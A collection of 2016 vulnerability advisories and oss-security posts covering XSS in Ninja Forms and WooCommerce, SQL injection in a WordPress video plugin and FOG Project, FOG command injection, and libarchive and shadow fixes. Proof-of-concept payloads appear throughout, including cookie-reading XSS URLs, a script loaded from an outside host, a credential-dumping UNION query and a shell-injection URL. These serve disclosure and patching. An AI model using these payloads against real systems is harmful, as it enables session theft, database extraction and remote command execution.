https://github.com/strangerstudios/paid-memberships-pro/commit/d39a18b3e9fd373665a23e5e79e8caff77a3e7f4
------------------------------------------------------------------------
Multiple Cross-Site Scripting vulnerabilities in Ninja Forms WordPress
Plugin
------------------------------------------------------------------------
Han Sahin, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
Multiple reflected Cross-Site Scripting (XSS) vulnerabilities have been
found in the Ninja Forms WordPress Plugin. By using this issue an
attacker can inject malicious JavaScript code into the application,
which will execute within the browser of any user who views the relevant
application content. 

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160714-0017

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Ninja Forms WordPress Plugin [2]
version 2.9.51.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Ninja Forms v2.9.52 (18 July 2016) [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The WordPress Ninja Forms plugin [2] is a plugin that simplifies
creating forms and managing submissions. Multiple reflected Cross-Site
Scripting vulnerabilities have been discovered in the WordPress Ninja
Forms plugin that allow an unauthenticated attacker to inject malicious
JavaScript code into the application, which will execute within the
browser of any user who views the relevant application content. The
attacker-supplied code can perform a wide variety of actions, such as
stealing victims' session tokens or login credentials, performing
arbitrary actions on their behalf, and logging their keystrokes or
deliver malware.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The WordPress Ninja Forms plugin insufficiently performs CSRF validation
(ajaxreferer and nonce) and fails to perform output encoding according
to context at any point where user-supplied input is copied into
application responses. The vulnerability at least resides in the
admin-ajax.php and edit.php page actions of the Ninja Forms plugin. As a
result this malicious code will be executed. 

Authenticated WP-Admins can be induced to issue the attacker's crafted
request in various ways. For example, the attacker can send a victim a
link containing a malicious URL or they can create an innocuous looking
web site that causes anyone viewing it to make arbitrary cross-domain
requests to the vulnerable application (using GET).

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
These vulnerabilities can be demonstrated by submitting the following
requests to the form_id parameter of the admin-ajax.php and edit.php
pages respectively:
/wp-admin/admin-ajax.php?step=4&total_steps=6&args[form_id]=1lxmjg<img
src%3daonerror%3dalert(document.cookie)>meiij&args[filename]=kllk'<&action=nf_download_all_subs

/wp-admin/edit.php?post_status=all&post_type=nf_sub&action=-1&m=0&form_id=1'><script>alert(`SumOfPwn.nl`)<%2Fscript>&paged=1&mode=list&action2=-1

Please note that the other parameter in this request are also
vulnerable.
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/multiple_cross_site_scripting_vulnerabilities_in_ninja_forms_wordpress_plugin.html

[2] https://wordpress.org/plugins/ninja-forms/

[3] https://wordpress.org/plugins/ninja-forms/changelog/
------------------------------------------------------------------------
Multiple SQL injection vulnerabilities in WordPress Video Player
------------------------------------------------------------------------
David Vaartjes & Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that WordPress Video Player is affected by multiple
blind SQL injection vulnerabilities. Using these issues it is possible
for a logged on Contributor (or higher) to extract arbitrary data (eg,
the Administrator's password hash) from the WordPress database.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0004

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on WordPress Video Player [2]
WordPress plugin version 1.5.16.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in WordPress Video Player 1.5.18 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
WordPress Video Player is a WordPress video plugin that allows you to
easily add videos to your website. WordPress Video Player is affected by
multiple blind SQL injection vulnerabilities. Using these issues it is
possible for a logged on Contributor (or higher) to extract arbitrary
data (eg, the Administrator's password hash) from the WordPress
database.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The vulnerabilities exist in the functions show_tag(),
spider_video_select_playlist(), and spider_video_select_video(). The
author tried to prevent SQL injection by calling the esc_sql() [4]
WordPress function. However, the user input is used in the ORDER BY
clause and is consequently not quoted. Due to this it is possible to
inject arbitrary SQL statements despite the use of esc_sql()

show_tag():

[...]
	
if (isset($_POST['page_number'])) {
	if ($_POST['asc_or_desc']) {
		$sort["sortid_by"] =
esc_sql(esc_html(stripslashes($_POST['order_by'])));
		if ($_POST['asc_or_desc'] == 1) {
			$sort["custom_style"] = "manage-column column-title sorted asc";
			$sort["1_or_2"] = "2";
			$order = "ORDER BY " . $sort["sortid_by"] . " ASC";
		} else {
			$sort["custom_style"] = "manage-column column-title sorted desc";
			$sort["1_or_2"] = "1";
			$order = "ORDER BY " . $sort["sortid_by"] . " DESC";
		}
	}
 
spider_video_select_playlist():

[...]
if(isset($_POST['page_number']))
{
	if($_POST['asc_or_desc'])
	{
		$sort["sortid_by"]=esc_sql(esc_html(stripslashes($_POST['order_by'])));
		if($_POST['asc_or_desc']==1)
		{
			$sort["custom_style"]="manage-column column-title sorted asc";
			$sort["1_or_2"]="2";
			$order="ORDER BY ".$sort["sortid_by"]." ASC";
		}
		else
		{
			$sort["custom_style"]="manage-column column-title sorted desc";
			$sort["1_or_2"]="1";
			$order="ORDER BY ".$sort["sortid_by"]." DESC";
		}
	}

function spider_video_select_video():

[...]
	
if(isset($_POST['page_number']))
{
		if($_POST['asc_or_desc'])
		{
			$sort["sortid_by"]=esc_html(stripslashes($_POST['order_by']));
			if($_POST['asc_or_desc']==1)
			{
				$sort["custom_style"]="manage-column column-title sorted asc";
				$sort["1_or_2"]="2";
				$order="ORDER BY ".esc_sql($sort["sortid_by"])." ASC";
			}
			else
			{
				$sort["custom_style"]="manage-column column-title sorted desc";
				$sort["1_or_2"]="1";
				$order="ORDER BY ".esc_sql($sort["sortid_by"])." DESC";
			}
		}

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form
action="http://<target>/wp-admin/admin-ajax.php?action=spiderVeideoPlayerselectplaylist"
method="POST">
			<input type="hidden" name="search_events_by_title" value="" />
			<input type="hidden" name="page_number" value="0" />
			<input type="hidden" name="serch_or_not" value="" />
			<input type="hidden" name="asc_or_desc" value="1" />
			<input type="hidden" name="order_by" value="(CASE WHEN (SELECT
sleep(10)) = 1 THEN id ELSE title END) ASC #" />
			<input type="hidden" name="option" value="com_Spider_Video_Player" />
			<input type="hidden" name="task" value="select_playlist" />
			<input type="hidden" name="boxchecked" value="0" />
			<input type="hidden" name="filter_order_playlist" value="" />
			<input type="hidden" name="filter_order_Dir_playlist" value="" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/multiple_sql_injection_vulnerabilities_in_wordpress_video_player.html

[2] https://wordpress.org/plugins/player/

[3] https://downloads.wordpress.org/plugin/player.1.5.18.zip

[4] https://codex.wordpress.org/Function_Reference/esc_sql
------------------------------------------------------------------------
Persistent Cross-Site Scripting in WooCommerce using image metadata
(EXIF)
------------------------------------------------------------------------
Han Sahin, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A persistent Cross-Site Scripting (XSS) vulnerability has been found in
the WooCommerce WordPress Plugin (millions of active installations). An
attacker can create a specially crafted image file which, when uploaded
as a product image in WordPress, injects malicious JavaScript code into
the application. An attacker can use this vulnerability to perform a
wide variety of actions, such as stealing victims' session tokens or
login credentials, and performing arbitrary actions on their behalf.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160720-0006

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on WooCommerce [2] version 2.6.2.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in WooCommerce 2.6.3 [3] (Release Notes [4]).

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
WooCommerce [5] is a free eCommerce plugin for WordPress. It is the
world's favorite eCommerce solution that gives both store owners and
developers complete control. A persistent Cross-Site Scripting (XSS)
vulnerability has been found in the WooCommerce WordPress Plugin
(millions of active installations). An attacker can create a specially
crafted image file which, when uploaded as a product image in WordPress,
injects malicious JavaScript code into the application. An attacker can
use this vulnerability to perform a wide variety of actions, such as
stealing victims' session tokens or login credentials, and performing
arbitrary actions on their behalf.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
WooCommerce uses meta data from an image file to fill in the 'Caption'
section of an uploaded image in WordPress. Meta data of an image must be
treated as untrusted user input and can be manipulated using an
Exchangeable Image File Format (EXIF) editor. A vulnerability was found
in the way WooCommerce processes meta data (Caption). Using a specially
crafted image it is possible to trigger a Cross-Site Scripting condition
in WooCommerce.

It is difficult for a WP admin to determine if an image contains a
malicious meta data. An attacker can craft and spread a popular image
via social media with malicious Cross-Site Scripting payload that will
be used as Caption by WooCommerce. When an admin upload this image as
product image and gallery item without properly checking meta data it is
possible to malicious scripting code is injected in the WooCommerce
site. An attacker can use this vulnerability to perform a wide variety
of actions, such as stealing victims' session tokens or login
credentials, and performing arbitrary actions on their behalf.

The code fragment below shows that meta data is used for the caption and
title of an image.

function wc_rest_set_uploaded_image_as_attachment( $upload, $id = 0 ) {
	$info    = wp_check_filetype( $upload['file'] );
	$title   = '';
	$content = '';
	
	if ( ! function_exists( 'wp_generate_attachment_metadata' ) ) {
		include_once( ABSPATH . 'wp-admin/includes/image.php' );
	}
	
	if ( $image_meta = wp_read_image_metadata( $upload['file'] ) ) {
		if ( trim( $image_meta['title'] ) && ! is_numeric( sanitize_title(
$image_meta['title'] ) ) ) {
			$title = $image_meta['title'];
		}
		if ( trim( $image_meta['caption'] ) ) {
			$content = $image_meta['caption'];
		}
	}
	
	$attachment = array(
		'post_mime_type' => $info['type'],
		'guid'           => $upload['url'],
		'post_parent'    => $id,
		'post_title'     => $title,
		'post_content'   => $content,
	);
	
	$attachment_id = wp_insert_attachment( $attachment, $upload['file'],
$id );
	if ( ! is_wp_error( $attachment_id ) ) {
		wp_update_attachment_metadata( $attachment_id,
wp_generate_attachment_metadata( $attachment_id, $upload['file'] ) );
	}
	return $attachment_id;
}

As seen in the code listing below the output of the meta data is not
properly encoded, resulting in persistent Cross-Site Scripting.

<div class="images">
	<?php
		if ( has_post_thumbnail() ) {
			$attachment_count = count( $product->get_gallery_attachment_ids() );
			$gallery          = $attachment_count > 0 ? '[product-gallery]' : '';
			$props            = wc_get_product_attachment_props(
get_post_thumbnail_id(), $post );
			$image            = get_the_post_thumbnail( $post->ID, apply_filters(
'single_product_large_thumbnail_size', 'shop_single' ), array(
			'title'     => $props['title'],
			'alt'    => $props['alt'],
		) );
			echo apply_filters( 'woocommerce_single_product_image_html', sprintf(
'<a href="%s" itemprop="image" class="woocommerce-main-image zoom"
title="%s" data-rel="prettyPhoto' . $gallery . '">%s</a>',
$props['url'], $props['caption'], $image ), $post->ID );
		} else {
			echo apply_filters( 'woocommerce_single_product_image_html', sprintf(
'<img src="%s" alt="%s" />', wc_placeholder_img_src(), __(
'Placeholder', 'woocommerce' ) ), $post->ID );
		}
		do_action( 'woocommerce_product_thumbnails' );
	?>
</div>

------------------------------------------------------------------------
Reproduction
------------------------------------------------------------------------
The following two images can be user to reproduce this issue:

- Product image [6]
- Gallery image [7]

It is also possible to craft your own malicious image using an EXIF
editor, the following payloads can be used:

Product image:

jaVasCript:/*-/*`/*\`/*'/*"/**/(/*
*/oNcliCk='s=document.createElement(`script`);s.src=`https://sumofpwn.nl/js/jquery.js`;document.body.appendChild(s)

'//%0D%0A%0d%0a//</stYle//titLe//teXtarEa//scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

Gallery image:

<a href="javascript&#58alert(document.cookie);">Click for new Pokemon
game</a>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_woocommerce_using_image_metadata__exif_.html

[2] https://wordpress.org/plugins/woocommerce/developers/

[3] https://downloads.wordpress.org/plugin/woocommerce.2.6.3.zip

[4]
https://woocommerce.wordpress.com/2016/07/19/woocommerce-2-6-3-fixsecurity-release-notes/

[5] https://wordpress.org/plugins/woocommerce/

[6] https://sumofpwn.nl/advisory/2016/SumOfPwn_productimage.jpg

[7] https://sumofpwn.nl/advisory/2016/WinPokemonGO_gallery_item.jpg
Christian Wressnegger | 20 Jul 09:32 2016
Picon
Picon

Buffer overflow in libarchive-3.2.0

Hi oss-security,
(please note, I'm not on the list.)

We've recently discovered a vulnerability in libarchive-3.2.0 when
writing iso9660 containers and reported it to the developers.

https://github.com/libarchive/libarchive/issues/711

The issue has been addressed by the following commit

https://github.com/libarchive/libarchive/commit/3014e19820ea53c15c90f9d447ca3e668a0b76c6

and included in version 3.2.1 of the library.

I was wondering whether anybody could assign a CVE for this?

Thanks and kind regards,
Christian Wressnegger (TU Braunschweig)

Sebastian Krahmer | 19 Jul 11:39 2016

subuid security patches for shadow package

Hi

The shadow package contains newuidmap and newgidmap suid
binaries in order to allow users to take advantage of the
userns feature of uid-mappings.

I added patches here:

https://bugzilla.suse.com/show_bug.cgi?id=979282

they consist of:

1) Removing getlogin() to find out about users.
   It relies on utmp, which is not a trusted base of info (group writable).

2) Cleaning up UID retrieval and computation. The 'long long' code was
   totally unclear to me, as the numbers are converted to ulong right
   afterwards anyway. Additionally there was a *int overflow*, which can be
   tested via 'newuidmap $$ 0 10000 -1' (given that 10000 is listed as allowed)
   which produces no error but tries to write large "count" values to the uid_map
   file. Kernel may check for overflows itself, but it should not be allowed
   by a suid binary to be written in the first place.

Theoretically theres also a TOCTOU issue in newuidmap, since the
st_uid fields of the stat on /proc/pid may change over time
(suid being executed), but to my analsysis such twists have no gain
for the attacker.

Patch should be tested by upstream, since I am not sure what the
getlogin() code (shared uids??) was about at all.

Sebastian

--

-- 

~ perl self.pl
~ $_='print"\$_=\47$_\47;eval"';eval
~ krahmer@... - SuSE Security Team

Sysdream Labs | 19 Jul 11:12 2016

CVE ID Request: FOG Project Multiple Vulnerabilities

# FOG Project Multiple Vulnerabilities

## Description

FOG is a free, open source, computer cloning and management solution.

## SQL Injection

The database functions located in the *FOGManagerController.class.php* file do not sanitize some
parameters, which can input from unauthenticated users.
Thus, an attacker without any privilege could execute arbitrary SQL commands and retrieve sensitive
information from the database.

**Access Vector**: remote

**Security Risk**: high

**Vulnerability**: CWE-89

**CVSS Base Score**: 9.3 (Critical)

### Proof of Concept

Payload:

```
' UNION ALL SELECT NULL,NULL,(SELECT GROUP_CONCAT(CONCAT_WS(':', uName, uPass)) FROM
users),NULL,NULL-- -
```

Base64 Encoded :

```
https://fogserver/fog/service/updates.php?action=ask&file=JyBVTklPTiBBTEwgU0VMRUNUIE5VTEwsTlVMTCwoU0VMRUNUIEdST1VQX0NPTkNBVChDT05DQVRfV1MoJzonLCB1TmFtZSwgdVBhc3MpKSBGUk9NIHVzZXJzKSxOVUxMLE5VTEwtLSA=
```

### Vulnerable code

The vulnerable code is located in *packages/web/lib/fog/FOGManagerController.class.php*, line 96,
function *find()*:

```
if (is_array($value))
      $whereArray[] = sprintf("`%s` IN ('%s')", $this->DB->sanitize($this->key($field)), implode("',
'", $value));
else
      $whereArray[] = sprintf("`%s` %s '%s'", $this->DB->sanitize($this->key($field)),
(preg_match('#%#', $value) ? 'LIKE' : '='), $value);
```

Note: *sanitize()* is applied on the database table field (not on the user-controlled value) and it does
not filter back-quotes. As a consequence, this function is useless.

Line 143, function *count()*:

```
if (is_array($value))
        $whereArray[] = sprintf("`%s` IN ('%s')", $this->DB->sanitize($this->key($field)), implode("',
'", $value));
else
        $whereArray[] = sprintf("`%s` %s '%s'", $this->DB->sanitize($this->key($field)),
(preg_match('#%#', $value) ? 'LIKE' : '='), $value);
```

The vulnerable functions can be called in multiple files, without any authentication.

File: *packages/web/service/updates.php*, line 14:

```
foreach($FOGCore->getClass('ClientUpdaterManager')->find(array('name' =>
base64_decode($_REQUEST['file']))) AS $ClientUpdate)
```

File *packages/web/service/servicemodule-active.php*, line 14:

```
$moduleID = current($FOGCore->getClass('ModuleManager')->find(array('shortName' => $_REQUEST['moduleid'])));
```

### Solution

Sanitize every user-supplied input when passing it to SQL Queries.

## Unauthenticated Remote Command Execution

The *freespace.php* file does not correctly sanitize user-supplied *idnew* parameters. An
unauthenticated attacker may use this file to execute system commands.

**Access Vector**: remote

**Security Risk**: high

**Vulnerability**: CWE-88

**CVSS Base Score**: 10 (Critical)

### Proof of Concept

```
https://fogserver/status/freespace.php?idnew[path]=$(sleep%205)&idnew[id]=555&idnew[name]=SD&idnew[ip]=1234
```

### Vulnerable code

The vulnerable code is located in *packages/web/status/freespace.php*, line 34:

```
$StorageNode = ($_REQUEST['idnew'] ? new StorageNode($_REQUEST['idnew']) : null);
[...snip...]
$t = shell_exec("df ".$StorageNode->get('path')."| grep -vE \"^Filesystem|shm\"");
```

### Solution

Sanitize and verify every user-supplied input when passing it to shell_exec. Also, make sure only
authenticated users can access this file.

### Affected versions

* FOG Stable <= 1.2

## Solution

Switch to beta/development builds.

## Timeline (dd/mm/yyyy)

* 05/04/2016 : Initial discovery
* 06/07/2016 : Contact with vendor team with vulnerability description
* 18/07/2016 : Remind vendor to get a reply
* 19/07/2016 : Vendor acknowledges the report, saying that issues had been fixed a while ago in
beta/development builds and that using 1.2.0 stable version is now discouraged.

## Credits

* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)
* Gyver FERRAND, Sysdream (g.ferrand -at- sysdream -dot- com)

--

-- 
SYSDREAM Labs <labs@...>

GPG :
47D1 E124 C43E F992 2A2E
1551 8EB4 8CD9 D5B2 59A1

* Website: https://sysdream.com/
* Twitter:  <at> sysdream


Gmane